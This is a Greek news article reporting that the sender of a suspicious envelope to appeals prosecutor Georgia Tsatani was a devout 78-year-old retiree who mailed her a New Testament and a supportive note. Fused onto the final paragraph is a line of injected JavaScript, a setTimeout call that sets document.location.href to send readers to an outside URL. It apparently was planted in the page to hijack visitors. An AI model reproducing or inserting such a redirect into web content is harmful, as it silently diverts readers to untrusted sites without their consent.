Συνταξιούχος του ΟΤΕ ο αποστολέας της «ύποπτης» επιστολής στην Τσατάνη-Τι είπε στην αστυνομία

0
12

 

Εντοπίστηκε ο αποστολέας του ύποπτου φακέλου στο σπίτι της εισαγγελέως Εφετών Γεωργίας Τσατάνη στα Εξάρχεια εξαιτίας του οποίου σήμανε συναγερμός στις Αρχές την περασμένη Δευτέρα.

Σύμφωνα με δημοσίευμα του Ελεύθερου Τύπου, όπως φαίνεται, αποστολέας είναι ένας 78χρονος συνταξιούχος του ΟΤΕ ο οποίος έστειλε στην Τσατάνη τον φάκελο για να της εκφράσει τη συμπαράστασή του.

Άλλωστε ο ίδιος έγραφε μέσα στον φάκελο, ο οποίος περιείχε μια Καινή Διαθήκη κι ένα σημείωμα προς την εισαγγελέα, τα πραγματικά του στοιχεία και τη διεύθυνση του σπιτιού του.

Οι αστυνομικοί αναζήτησαν τον αποστολέα του φακέλου και τον εντόπισαν στο σπίτι του. Πληροφορίες αναφέρουν ότι πρόκειται για έναν θεοσεβούμενο άνδρα. «Έστειλα την Καινή Διαθήκη για να τους φυλάει ο Θεός» είπε ο 78χρονος, σύμφωνα με το δημοσίευμα.

Ο άνθρωπος αυτός ήταν άγνωστος στην Εισαγγελέα Εφετών, η οποία μόλις είδε στο γραμματοκιβώτιό της φάκελο με άγνωστο αποστολέα ανησύχησε και ενημέρωσε την Αστυνομία. Το γράμμα που περιέχονταν στον φάκελο έγραφε: «Σας εύχομαι καλή δύναμη στο δύσκολο έργο σας και καλό κουράγιο για τα όσα περνάτε. Να σας έχει καλά ο Θεός».

Η έκπληξη των αστυνομικών μεγάλωσε όταν ο 78χρονος τους είπε ότι είχε στείλει την Καινή Διαθήκη και στον διοικητή του Αστυνομικού Τμήματος Ιτέας, ο οποίος είχε γίνει στόχος τρομοκρατών τον Απρίλιο του 2014 όταν του είχαν στείλει πακέτο-βόμβα στο γραφείο του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here